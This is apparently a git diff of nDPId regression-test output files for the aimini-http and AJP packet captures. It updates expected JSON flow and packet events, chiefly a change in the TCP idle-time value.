{"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} 
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","packets-captured":139,"packets-processed":133,"total-skipped-flows":0,"total-l4-data-len":79130,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1614860229390} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ 
packets captured/processed: 139/133 diff --git a/test/results/ajp.pcap.out b/test/results/ajp.pcap.out index caf8b7e52..157f9eb8b 100644 --- a/test/results/ajp.pcap.out +++ b/test/results/ajp.pcap.out 
@@ -1,12 +1,12 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ajp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1505154584447} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9JcsXbLwAAAACgAjkI5g0AAAIEBbQEAggKTpxp5wAAAAABAwMH"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSZfIk6AuuHLF2zCgEjiQFewAAAIEBbQEAggKHlfv2E6caecBAwMH"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9JcsXbLwAAAACgAjkI5g0AAAIEBbQEAggKTpxp5wAAAAABAwMH"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584447,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSZfIk6AuuHLF2zCgEjiQFewAAAIEBbQEAggKHlfv2E6caecBAwMH"} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="} 
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584447} 
@@ -17,13 +17,13 @@ 01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584448} 
00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9KcsXbLwAAAACgAjkI5gwAAAIEBbQEAggKTpxp5wAAAAABAwMH"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSpfIk6AuuHLF2zCgEjiQFesAAAIEBbQEAggKHlfv2E6caecBAwMH"} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9KcsXbLwAAAACgAjkI5gwAAAIEBbQEAggKTpxp5wAAAAABAwMH"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSpfIk6AuuHLF2zCgEjiQFesAAAIEBbQEAggKHlfv2E6caecBAwMH"} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 
00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="} 
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} 
@@ -34,8 +34,8 @@ 01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} 
00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 
